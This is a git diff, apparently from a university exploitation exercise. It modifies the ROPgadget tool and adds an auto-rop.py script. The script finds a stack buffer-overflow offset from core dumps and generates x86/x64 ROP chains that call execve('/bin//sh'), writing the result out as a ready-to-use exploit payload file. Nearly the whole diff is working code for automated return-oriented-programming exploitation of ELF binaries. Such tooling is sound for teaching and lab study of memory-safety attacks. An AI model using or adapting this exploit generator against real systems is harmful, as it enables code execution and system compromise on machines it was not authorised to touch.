diff --git a/.gitignore b/.gitignore
index 5cf5a46..26fa6f2 100644
--- a/.gitignore
+++ b/.gitignore
@@ -137,4 +137,5 @@ dmypy.json
 
 # binaries
 vuln-32
-core
\ No newline at end of file
+core
+out
\ No newline at end of file
diff --git a/ROPgadget/ropgadget/__init__.py b/ROPgadget/ropgadget/__init__.py
index 2201b59..c533e3f 100644
--- a/ROPgadget/ropgadget/__init__.py
+++ b/ROPgadget/ropgadget/__init__.py
@@ -17,12 +17,12 @@ import ropgadget.version
 import ropgadget.loaders
 import ropgadget.ropchain
 
-def main():
+def main(arguments=None):
     import sys
     from   ropgadget.args import Args
     from   ropgadget.core import Core
     try:
-        args = Args()
+        args = Args(arguments)
     except ValueError as e:
         print(e)
         sys.exit(-1)
diff --git a/ROPgadget/ropgadget/args.py b/ROPgadget/ropgadget/args.py
index 1bb53b0..b46f1e0 100644
--- a/ROPgadget/ropgadget/args.py
+++ b/ROPgadget/ropgadget/args.py
@@ -84,6 +84,7 @@ architectures supported:
         parser.add_argument("--rawEndian",          type=str, metavar="<endian>",     help="Specify an endianness for a raw file")
         parser.add_argument("--re",                 type=str, metavar="<re>",         help="Regular expression")
         parser.add_argument("--offset",             type=str, metavar="<hexaddr>",    help="Specify an offset for gadget addresses")
+        parser.add_argument("--paddingLen",         type=int, metavar="<nbyte>",      default=6, help="Specify the padding length for the ROP chain")
         parser.add_argument("--ropchain",           action="store_true",              help="Enable the ROP chain generation")
         parser.add_argument("--thumb"  ,            action="store_true",              help="Use the thumb mode for the search engine (ARM only)")
         parser.add_argument("--console",            action="store_true",              help="Use an interactive console for search engine")
diff --git a/ROPgadget/ropgadget/core.py b/ROPgadget/ropgadget/core.py
index 6cebb95..f6f93d6 100644
--- a/ROPgadget/ropgadget/core.py
+++ b/ROPgadget/ropgadget/core.py
@@ -215,7 +215,7 @@ class Core(cmd.Cmd):
             self.__getGadgets()
             self.__lookingForGadgets()
             if self.__options.ropchain:
-                ROPMaker(self.__binary, self.__gadgets, self.__offset)
+                ROPMaker(self.__binary, self.__gadgets, self.__options.paddingLen, self.__offset)
             return True
 
 
diff --git a/ROPgadget/ropgadget/ropchain/arch/ropmakerx64.py b/ROPgadget/ropgadget/ropchain/arch/ropmakerx64.py
index 8369d0c..4bc1977 100644
--- a/ROPgadget/ropgadget/ropchain/arch/ropmakerx64.py
+++ b/ROPgadget/ropgadget/ropchain/arch/ropmakerx64.py
@@ -14,9 +14,10 @@ from   capstone import *
 
 
 class ROPMakerX64(object):
-    def __init__(self, binary, gadgets, liboffset=0x0):
-        self.__binary  = binary
-        self.__gadgets = gadgets
+    def __init__(self, binary, gadgets, paddingLen, liboffset=0x0):
+        self.__binary   = binary
+        self.__gadgets  = gadgets
+        self.paddingLen = paddingLen
 
         # If it's a library, we have the option to add an offset to the addresses
         self.__liboffset = liboffset
@@ -40,7 +41,7 @@ class ROPMakerX64(object):
                         if g != "ret":
                             if g.split()[0] == "ret" and g.split()[1] != "":
                                 raise
-                    print("\t[+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
+                    print("# [+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
                     return [gadget, regex.group("dst"), regex.group("src")]
                 except:
                     continue
@@ -58,7 +59,7 @@ class ROPMakerX64(object):
                         # we need this to filterout 'ret' instructions with an offset like 'ret 0x6', because they ruin the stack pointer
                             if g.split()[0] == "ret" and g.split()[1] != "":
                                 raise
-                    print("\t[+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
+                    print("# [+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
                     return gadget
                 except:
                     continue
@@ -70,9 +71,9 @@ class ROPMakerX64(object):
             if g.split()[0] == "pop":
                 reg = g.split()[1]
                 try:
-                    print("\tp += pack('<Q', 0x%016x) # padding without overwrite %s" %(regAlreadSetted[reg], reg))
+                    print("p += pack('<Q', 0x%016x) # padding without overwrite %s" %(regAlreadSetted[reg], reg))
                 except KeyError:
-                    print("\tp += pack('<Q', 0x4141414141414141) # padding")
+                    print("p += pack('<Q', 0x4141414141414141) # padding")
 
     def __buildRopChain(self, write4where, popDst, popSrc, xorSrc, xorRax, incRax, popRdi, popRsi, popRdx, syscall):
 
@@ -82,99 +83,99 @@ class ROPMakerX64(object):
             if s["name"] == ".data":
                 dataAddr = s["vaddr"] + self.__liboffset
         if dataAddr is None:
-            print("\n[-] Error - Can't find a writable section")
+            print("# [-] Error - Can't find a writable section")
             return
 
-        print("\t#!/usr/bin/env python2")
-        print("\t# execve generated by ROPgadget\n")
-        print("\tfrom struct import pack\n")
+        print("#!/usr/bin/env python3")
+        print("# execve generated by ROPgadget\n")
+        print("# from struct import pack\n")
 
-        print("\t# Padding goes here")
-        print("\tp = ''\n")
+        print("# Padding goes here")
+        print("p = b'" + ('A' * self.paddingLen) + "'\n")
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(popDst["vaddr"], popDst["gadget"]))
-        print("\tp += pack('<Q', 0x%016x) # @ .data" %(dataAddr))
+        print("p += pack('<Q', 0x%016x) # %s" %(popDst["vaddr"], popDst["gadget"]))
+        print("p += pack('<Q', 0x%016x) # @ .data" %(dataAddr))
         self.__padding(popDst, {})
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(popSrc["vaddr"], popSrc["gadget"]))
-        print("\tp += '/bin//sh'")
+        print("p += pack('<Q', 0x%016x) # %s" %(popSrc["vaddr"], popSrc["gadget"]))
+        print("p += b'/bin//sh'")
         self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr}) # Don't overwrite reg dst
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(write4where["vaddr"], write4where["gadget"]))
+        print("p += pack('<Q', 0x%016x) # %s" %(write4where["vaddr"], write4where["gadget"]))
         self.__padding(write4where, {})
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(popDst["vaddr"], popDst["gadget"]))
-        print("\tp += pack('<Q', 0x%016x) # @ .data + 8" %(dataAddr + 8))
+        print("p += pack('<Q', 0x%016x) # %s" %(popDst["vaddr"], popDst["gadget"]))
+        print("p += pack('<Q', 0x%016x) # @ .data + 8" %(dataAddr + 8))
         self.__padding(popDst, {})
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(xorSrc["vaddr"], xorSrc["gadget"]))
+        print("p += pack('<Q', 0x%016x) # %s" %(xorSrc["vaddr"], xorSrc["gadget"]))
         self.__padding(xorSrc, {})
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(write4where["vaddr"], write4where["gadget"]))
+        print("p += pack('<Q', 0x%016x) # %s" %(write4where["vaddr"], write4where["gadget"]))
         self.__padding(write4where, {})
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(popRdi["vaddr"], popRdi["gadget"]))
-        print("\tp += pack('<Q', 0x%016x) # @ .data" %(dataAddr))
+        print("p += pack('<Q', 0x%016x) # %s" %(popRdi["vaddr"], popRdi["gadget"]))
+        print("p += pack('<Q', 0x%016x) # @ .data" %(dataAddr))
         self.__padding(popRdi, {})
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(popRsi["vaddr"], popRsi["gadget"]))
-        print("\tp += pack('<Q', 0x%016x) # @ .data + 8" %(dataAddr + 8))
+        print("p += pack('<Q', 0x%016x) # %s" %(popRsi["vaddr"], popRsi["gadget"]))
+        print("p += pack('<Q', 0x%016x) # @ .data + 8" %(dataAddr + 8))
         self.__padding(popRsi, {"rdi": dataAddr}) # Don't overwrite rdi
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(popRdx["vaddr"], popRdx["gadget"]))
-        print("\tp += pack('<Q', 0x%016x) # @ .data + 8" %(dataAddr + 8))
+        print("p += pack('<Q', 0x%016x) # %s" %(popRdx["vaddr"], popRdx["gadget"]))
+        print("p += pack('<Q', 0x%016x) # @ .data + 8" %(dataAddr + 8))
         self.__padding(popRdx, {"rdi": dataAddr, "rsi": dataAddr + 8}) # Don't overwrite rdi and rsi
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(xorRax["vaddr"], xorRax["gadget"]))
+        print("p += pack('<Q', 0x%016x) # %s" %(xorRax["vaddr"], xorRax["gadget"]))
         self.__padding(xorRax, {"rdi": dataAddr, "rsi": dataAddr + 8}) # Don't overwrite rdi and rsi
 
         for i in range(59):
-            print("\tp += pack('<Q', 0x%016x) # %s" %(incRax["vaddr"], incRax["gadget"]))
+            print("p += pack('<Q', 0x%016x) # %s" %(incRax["vaddr"], incRax["gadget"]))
             self.__padding(incRax, {"rdi": dataAddr, "rsi": dataAddr + 8}) # Don't overwrite rdi and rsi
 
-        print("\tp += pack('<Q', 0x%016x) # %s" %(syscall["vaddr"], syscall["gadget"]))
+        print("p += pack('<Q', 0x%016x) # %s" %(syscall["vaddr"], syscall["gadget"]))
 
     def __generate(self):
 
         # To find the smaller gadget
         self.__gadgets.reverse()
 
-        print("\nROP chain generation\n===========================================================")
+        print("\n# ROP chain generation\n#===========================================================")
 
-        print("\n- Step 1 -- Write-what-where gadgets\n")
+        print("\n# - Step 1 -- Write-what-where gadgets\n")
 
         gadgetsAlreadyTested = []
         while True:
             write4where = self.__lookingForWrite4Where(gadgetsAlreadyTested)
             if not write4where:
-                print("\t[-] Can't find the 'mov qword ptr [r64], r64' gadget")
+                print("# [-] Can't find the 'mov qword ptr [r64], r64' gadget")
                 return
 
             popDst = self.__lookingForSomeThing("pop %s" %(write4where[1]))
             if not popDst:
-                print("\t[-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[1]))
+                print("# [-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[1]))
                 gadgetsAlreadyTested += [write4where[0]]
                 continue
 
             popSrc = self.__lookingForSomeThing("pop %s" %(write4where[2]))
             if not popSrc:
-                print("\t[-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[2]))
+                print("# [-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[2]))
                 gadgetsAlreadyTested += [write4where[0]]
                 continue
 
             xorSrc = self.__lookingForSomeThing("xor %s, %s" %(write4where[2], write4where[2]))
             if not xorSrc:
-                print("\t[-] Can't find the 'xor %s, %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[2], write4where[2]))
+                print("# [-] Can't find the 'xor %s, %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[2], write4where[2]))
                 gadgetsAlreadyTested += [write4where[0]]
                 continue
             else:
                 break
 
-        print("\n- Step 2 -- Init syscall number gadgets\n")
+        print("\n# - Step 2 -- Init syscall number gadgets\n")
 
         xorRax = self.__lookingForSomeThing("xor rax, rax")
         if not xorRax:
-            print("\t[-] Can't find the 'xor rax, rax' instruction")
+            print("# [-] Can't find the 'xor rax, rax' instruction")
             return
 
         incRax = self.__lookingForSomeThing("inc rax")
@@ -187,7 +188,7 @@ class ROPMakerX64(object):
         instr = [incRax, incEax, incAx, addRax, addEax, addAx]
 
         if all(v is None for v in instr):
-            print("\t[-] Can't find the 'inc rax' or 'add rax, 1' instruction")
+            print("# [-] Can't find the 'inc rax' or 'add rax, 1' instruction")
             return
 
         for i in instr:
@@ -195,31 +196,31 @@ class ROPMakerX64(object):
                 incRax = i
                 break
 
-        print("\n- Step 3 -- Init syscall arguments gadgets\n")
+        print("\n# - Step 3 -- Init syscall arguments gadgets\n")
 
         popRdi = self.__lookingForSomeThing("pop rdi")
         if not popRdi:
-            print("\t[-] Can't find the 'pop rdi' instruction")
+            print("# [-] Can't find the 'pop rdi' instruction")
             return
 
         popRsi = self.__lookingForSomeThing("pop rsi")
         if not popRsi:
-            print("\t[-] Can't find the 'pop rsi' instruction")
+            print("# [-] Can't find the 'pop rsi' instruction")
             return
 
         popRdx = self.__lookingForSomeThing("pop rdx")
         if not popRdx:
-            print("\t[-] Can't find the 'pop rdx' instruction")
+            print("# [-] Can't find the 'pop rdx' instruction")
             return
 
-        print("\n- Step 4 -- Syscall gadget\n")
+        print("\n# - Step 4 -- Syscall gadget\n")
 
         syscall = self.__lookingForSomeThing("syscall")
         if not syscall:
-            print("\t[-] Can't find the 'syscall' instruction")
+            print("# [-] Can't find the 'syscall' instruction")
             return
 
-        print("\n- Step 5 -- Build the ROP chain\n")
+        print("# - Step 5 -- Build the ROP chain\n")
 
         self.__buildRopChain(write4where[0], popDst, popSrc, xorSrc, xorRax, incRax, popRdi, popRsi, popRdx, syscall)
 
diff --git a/ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py b/ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py
index e4694ee..eda2cb1 100644
--- a/ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py
+++ b/ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py
@@ -13,9 +13,10 @@ from   capstone import *
 
 
 class ROPMakerX86(object):
-    def __init__(self, binary, gadgets, liboffset=0x0):
-        self.__binary  = binary
-        self.__gadgets = gadgets
+    def __init__(self, binary, gadgets, paddingLen, liboffset=0x0):
+        self.__binary   = binary
+        self.__gadgets  = gadgets
+        self.paddingLen = paddingLen
 
         # If it's a library, we have the option to add an offset to the addresses
         self.__liboffset = liboffset
@@ -40,7 +41,7 @@ class ROPMakerX86(object):
                         if g != "ret":
                             if g.split()[0] == "ret" and g.split()[1] != "":
                                 raise
-                    print("\t[+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
+                    print("# [+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
                     return [gadget, regex.group("dst"), regex.group("src")]
                 except:
                     continue
@@ -58,7 +59,7 @@ class ROPMakerX86(object):
                         if g != "ret":
                             if g.split()[0] == "ret" and g.split()[1] != "":
                                 raise
-                    print("\t[+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
+                    print("# [+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
                     return gadget
                 except:
                     continue
@@ -70,9 +71,9 @@ class ROPMakerX86(object):
             if g.split()[0] == "pop":
                 reg = g.split()[1]
                 try:
-                    print("\tp += pack('<I', 0x%08x) # padding without overwrite %s" %(regAlreadSetted[reg], reg))
+                    print("p += pack('<I', 0x%08x) # padding without overwrite %s" %(regAlreadSetted[reg], reg))
                 except KeyError:
-                    print("\tp += pack('<I', 0x41414141) # padding")
+                    print("p += pack('<I', 0x41414141) # padding")
 
     def __buildRopChain(self, write4where, popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall):
 
@@ -82,142 +83,152 @@ class ROPMakerX86(object):
             if s["name"] == ".data":
                 dataAddr = s["vaddr"] + self.__liboffset
         if dataAddr == None:
-            print("\n[-] Error - Can't find a writable section")
+            print("\n# [-] Error - Can't find a writable section")
             return
 
-        print("\t#!/usr/bin/env python2")
-        print("\t# execve generated by ROPgadget\n" )
-        print("\tfrom struct import pack\n")
+        print("#!/usr/bin/env python2")
+        print("# execve generated by ROPgadget\n" )
+        print("from struct import pack\n")
+        print("import sys")
 
-        print("\t# Padding goes here")
-        print("\tp = ''\n")
+        print()
+        print("out_file = sys.argv[1]")
+        print()
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data" %(dataAddr))
+        print("p = b'" + ('A' * self.paddingLen) + "'\n")
+
+        print("p += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data" %(dataAddr))
         self.__padding(popDst, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(popSrc["vaddr"], popSrc["gadget"]))
-        print("\tp += '/bin'")
+        print("p += pack('<I', 0x%08x) # %s" %(popSrc["vaddr"], popSrc["gadget"]))
+        print("p += b'/bin'")
         self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr}) # Don't overwrite reg dst
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
         self.__padding(write4where, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data + 4" %(dataAddr + 4))
+        print("p += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data + 4" %(dataAddr + 4))
         self.__padding(popDst, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(popSrc["vaddr"], popSrc["gadget"]))
-        print("\tp += '//sh'")
+        print("p += pack('<I', 0x%08x) # %s" %(popSrc["vaddr"], popSrc["gadget"]))
+        print("p += b'//sh'")
         self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr + 4}) # Don't overwrite reg dst
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
         self.__padding(write4where, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
+        print("p += pack('<I', 0x%08x) # %s" %(popDst["vaddr"], popDst["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
         self.__padding(popDst, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(xorSrc["vaddr"], xorSrc["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" %(xorSrc["vaddr"], xorSrc["gadget"]))
         self.__padding(xorSrc, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" %(write4where["vaddr"], write4where["gadget"]))
         self.__padding(write4where, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(popEbx["vaddr"], popEbx["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data" %(dataAddr))
+        print("p += pack('<I', 0x%08x) # %s" %(popEbx["vaddr"], popEbx["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data" %(dataAddr))
         self.__padding(popEbx, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(popEcx["vaddr"], popEcx["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
+        print("p += pack('<I', 0x%08x) # %s" %(popEcx["vaddr"], popEcx["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
         self.__padding(popEcx, {"ebx": dataAddr}) # Don't overwrite ebx
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(popEdx["vaddr"], popEdx["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
+        print("p += pack('<I', 0x%08x) # %s" %(popEdx["vaddr"], popEdx["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data + 8" %(dataAddr + 8))
         self.__padding(popEdx, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(xorEax["vaddr"], xorEax["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" %(xorEax["vaddr"], xorEax["gadget"]))
         self.__padding(xorEax, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
 
         for i in range(11):
-            print("\tp += pack('<I', 0x%08x) # %s" %(incEax["vaddr"], incEax["gadget"]))
+            print("p += pack('<I', 0x%08x) # %s" %(incEax["vaddr"], incEax["gadget"]))
             self.__padding(incEax, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
 
-        print("\tp += pack('<I', 0x%08x) # %s" %(syscall["vaddr"], syscall["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" %(syscall["vaddr"], syscall["gadget"]))
+
+        print()
+        print(r"""
+with open(out_file, "wb") as f:
+    f.write(p)
+        """)
 
     def __generate(self):
 
         # To find the smaller gadget
         self.__gadgets.reverse()
 
-        print("\nROP chain generation\n===========================================================")
+        print("\n# ROP chain generation\n# ===========================================================")
 
-        print("\n- Step 1 -- Write-what-where gadgets\n")
+        print("\n# - Step 1 -- Write-what-where gadgets\n")
 
         gadgetsAlreadyTested = []
         while True:
             write4where = self.__lookingForWrite4Where(gadgetsAlreadyTested)
             if not write4where:
-                print("\t[-] Can't find the 'mov dword ptr [r32], r32' gadget")
+                print("# [-] Can't find the 'mov dword ptr [r32], r32' gadget")
                 return
 
             popDst = self.__lookingForSomeThing("pop %s" %(write4where[1]))
             if not popDst:
-                print("\t[-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[1]))
+                print("# [-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[1]))
                 gadgetsAlreadyTested += [write4where[0]]
                 continue
 
             popSrc = self.__lookingForSomeThing("pop %s" %(write4where[2]))
             if not popSrc:
-                print("\t[-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[2]))
+                print("# [-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" %(write4where[2]))
                 gadgetsAlreadyTested += [write4where[0]]
                 continue
 
             xorSrc = self.__lookingForSomeThing("xor %s, %s" %(write4where[2], write4where[2]))
             if not xorSrc:
-                print("\t[-] Can't find the 'xor %s, %s' gadget. Try with another 'mov [r], r'\n" %(write4where[2], write4where[2]))
+                print("# [-] Can't find the 'xor %s, %s' gadget. Try with another 'mov [r], r'\n" %(write4where[2], write4where[2]))
                 gadgetsAlreadyTested += [write4where[0]]
                 continue
             else:
                 break
 
-        print("\n- Step 2 -- Init syscall number gadgets\n")
+        print("\n# - Step 2 -- Init syscall number gadgets\n")
 
         xorEax = self.__lookingForSomeThing("xor eax, eax")
         if not xorEax:
-            print("\t[-] Can't find the 'xor eax, eax' instruction")
+            print("# [-] Can't find the 'xor eax, eax' instruction")
             return
 
         incEax = self.__lookingForSomeThing("inc eax")
         if not incEax:
-            print("\t[-] Can't find the 'inc eax' instruction")
+            print("# [-] Can't find the 'inc eax' instruction")
             return
 
-        print("\n- Step 3 -- Init syscall arguments gadgets\n")
+        print("\n# - Step 3 -- Init syscall arguments gadgets\n")
 
         popEbx = self.__lookingForSomeThing("pop ebx")
         if not popEbx:
-            print("\t[-] Can't find the 'pop ebx' instruction")
+            print("# [-] Can't find the 'pop ebx' instruction")
             return
 
         popEcx = self.__lookingForSomeThing("pop ecx")
         if not popEcx:
-            print("\t[-] Can't find the 'pop ecx' instruction")
+            print("# [-] Can't find the 'pop ecx' instruction")
             return
 
         popEdx = self.__lookingForSomeThing("pop edx")
         if not popEdx:
-            print("\t[-] Can't find the 'pop edx' instruction")
+            print("# [-] Can't find the 'pop edx' instruction")
             return
 
-        print("\n- Step 4 -- Syscall gadget\n")
+        print("\n# - Step 4 -- Syscall gadget\n")
 
         syscall = self.__lookingForSomeThing("int 0x80")
         if not syscall:
-            print("\t[-] Can't find the 'syscall' instruction")
+            print("# [-] Can't find the 'syscall' instruction")
             return
 
-        print("\n- Step 5 -- Build the ROP chain\n")
+        print("\n# - Step 5 -- Build the ROP chain\n")
 
         self.__buildRopChain(write4where[0], popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall)
 
diff --git a/ROPgadget/ropgadget/ropchain/ropmaker.py b/ROPgadget/ropgadget/ropchain/ropmaker.py
index 0d69dc3..3f1ff7f 100644
--- a/ROPgadget/ropgadget/ropchain/ropmaker.py
+++ b/ROPgadget/ropgadget/ropchain/ropmaker.py
@@ -11,10 +11,11 @@ from ropgadget.ropchain.arch.ropmakerx86   import *
 from ropgadget.ropchain.arch.ropmakerx64   import *
 
 class ROPMaker(object):
-    def __init__(self, binary, gadgets, offset):
-        self.__binary  = binary
-        self.__gadgets = gadgets
-        self.__offset  = offset
+    def __init__(self, binary, gadgets, paddingLen, offset):
+        self.__binary   = binary
+        self.__gadgets  = gadgets
+        self.paddingLen = paddingLen
+        self.__offset   = offset
 
         self.__handlerArch()
 
@@ -23,12 +24,12 @@ class ROPMaker(object):
         if self.__binary.getArch() == CS_ARCH_X86           \
             and self.__binary.getArchMode() == CS_MODE_32   \
             and self.__binary.getFormat() == "ELF":
-            ROPMakerX86(self.__binary, self.__gadgets, self.__offset)
+            ROPMakerX86(self.__binary, self.__gadgets, self.paddingLen, self.__offset)
 
         elif self.__binary.getArch() == CS_ARCH_X86         \
             and self.__binary.getArchMode() == CS_MODE_64   \
             and self.__binary.getFormat() == "ELF":
-            ROPMakerX64(self.__binary, self.__gadgets, self.__offset)
+            ROPMakerX64(self.__binary, self.__gadgets, self.paddingLen, self.__offset)
 
         else:
             print("\n[Error] ROPMaker.__handlerArch - Arch not supported yet for the rop chain generation")
diff --git a/offset.py b/auto-rop.py
similarity index 65%
rename from offset.py
rename to auto-rop.py
index 3ec8d97..b43b702 100644
--- a/offset.py
+++ b/auto-rop.py
@@ -4,10 +4,11 @@ from pwnlib.util.packing import pack
 from pwnlib.tubes.process import process, signal
 
 import os
+import sys
 import subprocess
 import argparse
-import warnings
-import ROPgadget.ropgadget
+from contextlib import redirect_stderr
+
 
 print(r'''
    _                ___       _.--.  ___        _____          ______ _____          ______ ______ 
@@ -21,11 +22,13 @@ print(r'''
 
 arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
 arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
-arg_parser.add_argument("--core", "--c", metavar="core_file", type=str, help="The name of the generated core file")
+arg_parser.add_argument("--core", "--c", metavar="core_file", default="core", type=str, help="The name of the generated core file")
+arg_parser.add_argument("rop_file", metavar="rop_file", type=str, help="The name of the generated ROP input file")
 args = arg_parser.parse_args()
 
 exec_file = args.exec_file
 core_file = args.core
+rop_file = args.rop_file
 
 def find_offset(exec_file, core_file):
     input_file = "input.txt"
@@ -46,7 +49,8 @@ def find_offset(exec_file, core_file):
         process([f"./{exec_file}", input_file]).wait()
 
         try:
-            core = Coredump(f"./{core_file}")
+            with open("/dev/null", "w") as f, redirect_stderr(f):
+                core = Coredump(f"./{core_file}")
             
             if core and pack(core.eip) in payload:
                 offset = cyclic_find(core.eip)
@@ -58,15 +62,26 @@ def find_offset(exec_file, core_file):
         os.remove(input_file)
         payload_size *= 2
     
-    raise BaseException("Failed to find offset")
-
+    raise BaseException("[😞] Failed to find offset.")
 
 offset = find_offset(exec_file, core_file)
 
-result = subprocess.run(["ROPgadget", "--binary", exec_file, "--ropchain"], stdout=subprocess.PIPE)
-stdout = result.stdout
+print(f"[🤔] Running ROPgadget with offset {offset}...")
+result = subprocess.run(
+    [
+        "ROPgadget",
+        "--binary", exec_file,
+        "--ropchain",
+        "--silent",
+        "--paddingLen", str(offset)
+    ], 
+    stdout = subprocess.PIPE
+)
 
+with open("script.py", "wb") as f:
+    f.write(result.stdout)
 
-stdout = stdout.replace(b"p = ''\n", b"p = \"" + bytes('a' * offset, 'ascii') + b"\"\n")
-with open("test.py", "wb") as f:
-    f.write(stdout)
+print(f"[🤔] Running generated script to create ROP input file...")
+process(["python3", "script.py", rop_file]).wait()
+
+print(f"[🤩] All done! The ROP input is saved to {rop_file}!")
diff --git a/init.sh b/init.sh
index 66066a7..ee64ab0 100644
--- a/init.sh
+++ b/init.sh
@@ -12,6 +12,9 @@ sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git li
 sudo apt-get --assume-yes --quiet install python
 python3 -m pip install --upgrade pip
 python3 -m pip install --upgrade pwntools
+python3 -m pip uninstall --yes ROPgadget
+
+cd /home/vagrant/cw && ./ropinstall.sh
 
 sudo apt-get clean
 
diff --git a/ropinstall.sh b/ropinstall.sh
new file mode 100755
index 0000000..b52a1d9
--- /dev/null
+++ b/ropinstall.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+
+cd ROPgadget && sudo python3 setup.py install
+